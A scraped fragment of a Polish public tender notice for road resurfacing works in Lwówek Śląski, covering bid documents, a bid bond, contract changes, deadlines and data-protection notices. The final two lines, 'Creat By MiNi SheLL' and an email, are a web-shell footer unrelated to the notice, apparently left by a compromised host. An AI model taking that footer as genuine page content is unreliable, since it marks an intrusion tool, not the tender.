aktualności informacji zawartych<br/>w oświadczeniu, o którym mowa w pkt. 1, w zakresie podstaw wykluczenia z postępowania<br/>wskazanych przez Zamawiającego – wzór: Załącznik nr 7 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Dokument potwierdzający, że Wykonawca jest ubezpieczony od<br/>odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia<br/>na sumę gwarancyjną określoną przez Zamawiającego; 2. Informacja banku lub spółdzielczej kasy<br/>oszczędnościowo-kredytowej potwierdzająca wysokość posiadanych środków finansowych lub<br/>zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed złożeniem oferty;<br/>3. Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem<br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z<br/>podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te<br/>zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane<br/>należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa<br/>budowlanego i prawidłowo ukończone – wzór: Załącznik nr 6 do SWZ; Dowodami, o których mowa są<br/>referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były<br/>wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w<br/>stanie uzyskać tych dokumentów – inne dokumenty. 4. Wykaz osób skierowanych przez Wykonawcę<br/>do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług,<br/>kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia<br/>publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do<br/>dysponowania tymi osobami - wzór: Załącznik nr 5 do SWZ</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>2. Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców<br/>ubiegających się wspólnie o udzielenie zamówienia – dotyczy ofert składanych przez<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>3. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby,<br/>zobowiązany jest złożyć wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do<br/>oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia lub inny<br/>podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie będzie<br/>dysponował niezbędnymi zasobami tych podmiotów oraz oświadczenie podmiotu<br/>udostępniającego zasoby o braku podstaw wykluczenia;<br/>4. Oświadczenie Wykonawców wspólnie ubiegających się o zamówienie (jeżeli dotyczy) – wzór:<br/>Załącznik nr 3 do SWZ. <br/>5. Dowód wniesienia wadium. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości:<br/>10.000,00 (słownie: dziesięć tysięcy złotych 00/100). 2. Wadium wnosi się przed upływem terminu<br/>składania ofert. 3. Wadium może być wnoszone w jednej lub kilku następujących formach: 3.1.<br/>pieniądzu; 3.2. gwarancjach bankowych; 3.3. gwarancjach ubezpieczeniowych; 3.4.<br/>poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9<br/>listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r.<br/>poz. 299). 4. Wadium w formie pieniądza należy wnieść przelewem na konto w Banku<br/>Powszechna Kasa Oszczędności Bank Polski Spółka Akcyjna w Bolesławcu nr rachunku nr 84<br/>1020 2137 0000 9902 0134 9554 z dopiskiem „Wadium – Remonty nawierzchni bitumicznych i tłuczniowych wraz z infrastrukturą towarzyszącą wykonywane w ramach bieżących remontów dróg gminnych na terenie miasta i gminy Lwówek Śląski.” UWAGA: Za termin wniesienia wadium w formie<br/>pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego. 5. Wadium wnoszone w<br/>formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji lub poręczenia w<br/>postaci elektronicznej i spełniać co najmniej poniższe wymagania: 5.1.musi obejmować<br/>odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę<br/>określone w Ustawie; 5.2. z jej treści powinno jednoznacznie wynikać zobowiązanie gwaranta do<br/>zapłaty całej kwoty wadium; 5.3. powinno być nieodwołalne i bezwarunkowe oraz płatne na<br/>pierwsze żądanie; 5.4. termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż<br/>termin związania ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest<br/>dzień składania ofert); 5.5. w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz<br/>numer przedmiotowego postępowania; 5.6. beneficjentem poręczenia lub gwarancji jest: Gmina<br/>i Miasto Lwówek Śląski; 5.7. w przypadku Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia (art. 58 Ustawy), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała<br/>swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza<br/>ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum); 6. Oferta<br/>wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma<br/>wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w<br/>przypadku, o którym mowa w art. 98 ust. 2 pkt 3 Ustawy zostanie odrzucona . 7. Zasady zwrotu<br/>oraz okoliczności zatrzymania wadium określa art. 98 Ustawy. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia publicznego. W przypadku<br/>wspólnego ubiegania się o udzielenie zamówienia: 1. Wykonawcy są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania<br/>ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo<br/>należy załączyć do oferty. 2. Warunek dotyczący uprawnień do prowadzenia określonej<br/>działalności gospodarczej lub zawodowej, będzie spełniony, jeżeli co najmniej jeden z<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do<br/>prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje roboty<br/>budowlane,dostawy lub usługi, do których realizacji te uprawnienia są wymagane. 3. W<br/>odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy wspólnie ubiegający się o udzielenia zamówienia mogą polegać na<br/>zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane. 4. W przypadku, o którym mowa w pkt. 2 i 3 Wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia zobowiązani są dołączyć do oferty<br/>oświadczenie, z którego wynikać będzie, które roboty budowlane, dostawy lub usługi wykonają<br/>poszczególni Wykonawcy. 5. W przypadku wspólnego ubiegania się o zamówienie przez<br/>Wykonawców, oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w<br/>postępowaniu składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw<br/>wykluczenia oraz spełniania warunków udziału w postępowaniu, w jakim każdy z Wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu. 6. W przypadku wadium wnoszonego w<br/>formie poręczeń lub gwarancji w przypadku Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia (art. 58 Ustawy), Zamawiający wymaga aby poręczenie lub gwarancja<br/>obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało,<br/>że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>(konsorcjum). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wszelkie zmiany umowy pod rygorem nieważności wymagają formy pisemnej.<br/>2.	Poza przypadkami wymienionymi w art. 455 ust. 1 pkt. 2 lit b i c, pkt. 3 i 4 oraz ust. 2 ustawy z dnia 11 września 2019 roku Prawo zamówień publicznych (t.j. Dz. U. z 2021 roku, poz. 1129 ze zm.), przewiduje się możliwość dokonania zmian postanowień umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy dotyczących:<br/>2.1.	przedłużenia terminu zakończenia realizacji przedmiotu umowy o okres trwania przyczyn, z powodu, których będzie zagrożone dotrzymanie terminu zakończenia przedmiotu umowy.<br/>3.	Zmiany, o których mowa w ust. 2, mogą być dokonane przed upływem terminu realizacji niniejszej umowy, na pisemny wniosek złożony w terminie 7 dni od daty wystąpienia lub powzięcia wiadomości o zaistniałych okolicznościach. Wniosek winien zawierać szczegółowe uzasadnienie, stosownie do zdarzenia lub okoliczności stanowiących podstawę żądania zmiany.<br/>4.	Zamawiający dopuszcza także inne podobne zmiany umowy w przypadku, gdy zmiana pozostaje w bezpośrednim związku przyczynowo – skutkowym z wystąpieniem danych okoliczności i nie wykracza poza to co konieczne w celu przeciwdziałania skutkom takiej zmiany okoliczności.<br/>5.	Stosownie do treści art. 436 pkt 4 lit. b ustawy z dnia 11 września 2019 roku Prawo zamówień publicznych (t.j. Dz. U. z 2021 roku, poz. 1129 ze zmianami), Zamawiający dopuszcza możliwość zmiany wysokości wynagrodzenia określonego w § 4 ust. 1. niniejszej umowy, w przypadku zmiany:<br/>5.1.	stawki podatku od towarów i usług;<br/>5.2.	wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę (t.j. Dz.U.2020.2207);<br/>5.3.	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne;<br/>5.4.	zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych (t.j. Dz.U.2020.1342 ze zmianami);<br/>	jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę.<br/>6. Zmiana Umowy w zakresie zmiany wynagrodzenia z przyczyn określonych w ust. 5 pkt. 5.1., 5.2., 5.3. i 5.4. obejmować będzie wyłącznie płatności za prace, których w dniu zmiany odpowiednio stawki podatku VAT, wysokości minimalnego wynagrodzenia za pracę i składki na ubezpieczenia społeczne lub zdrowotne, jeszcze nie wykonano.<br/>7.	Obowiązek wykazania wpływu zmian, o których mowa w ust. 5 niniejszego paragrafu na zmianę wynagrodzenia, o którym mowa w § 4 ust. 1 Umowy należy do Wykonawcy pod rygorem odmowy dokonania zmiany Umowy przez Zamawiającego.<br/>8.	Wszelkie zmiany Umowy są dokonywane przez umocowanych przedstawicieli Zamawiającego<br/>i Wykonawcy w formie pisemnej w drodze aneksu Umowy, pod rygorem nieważności.<br/>9.	W razie wątpliwości, przyjmuje się, że nie stanowią zmiany Umowy następujące zmiany:<br/>9.1.	danych związanych z obsługą administracyjno-organizacyjną Umowy,<br/>9.2.	danych teleadresowych,<br/>9.3.	danych rejestrowych.<br/><br/>szczegółowy zakres zmian umowy zawarty jest w załączniku nr 10 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-02-16 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć na platformazakupowa.pl pod adresem: https://platformazakupowa.pl/lwowekslaski w zakładce dedykowanej postępowaniu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-02-16 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-03-17</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> CIĄG DALSZY Z &#34;RODO (obowiązek informacyjny)&#34;: 8. PRAWA PODMIOTÓW DANYCH: -<br/>Posiada Pani/Pan prawo: −na podstawie art. 15 RODO prawo dostępu do danych osobowych<br/>Pani/Pana dotyczących; − na podstawie art. 16 RODO prawo do sprostowania Pani/Pana<br/>danych osobowych; − na podstawie art. 18 RODO prawo żądania od administratora<br/>ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w<br/>art. 18 ust. 2 RODO; - nie przysługuje Pani/Panu: − w związku z art. 17 ust. 3 lit. b, d lub e<br/>RODO prawo do usunięcia danych osobowych; − prawo do przenoszenia danych osobowych, o<br/>którym mowa w art. 20 RODO; − na podstawie art. 21 RODO prawo sprzeciwu, wobec<br/>przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych<br/>osobowych jest art. 6 ust. 1 lit. c RODO. 9. PRAWO WNIESIENIA SKARGI DO ORGANU<br/>NADZORCZEGO: Przysługuje Pani/Panu również prawo wniesienia skargi w zakresie ochrony<br/>danych osobowych do organu nadzorczego, którym jest Prezes Urzędu Ochrony Danych<br/>Osobowych z siedzibą przy ul. Stawki 2, 00-193 Warszawa, tel. 22 531 03 00, jeżeli stwierdzi<br/>Pani/Pan, że przetwarzanie danych osobowych dotyczących Pani/Pana narusza przepisy<br/>RODO. 10. ŹRÓDŁO POCHODZENIA DANYCH OSOBOWYCH: Źródłem pochodzenia Państwa<br/>danych są wszelkie dokumenty składane przez wykonawcę w ramach postępowania o<br/>udzielenie zamówienia publicznego. 11. INFORMACJA O DOWOLNOŚCI LUB OBOWIĄZKU<br/>PODANIA DANYCH: obowiązek podania danych osobowych wynika z ustawy z dnia 11<br/>września 2019r. Prawo zamówień publicznych i jest warunkiem niezbędnym do wzięcia udziału w postępowaniu o zamówienia publiczne.

Creat By MiNi SheLL
Email: jattceo@gmail.com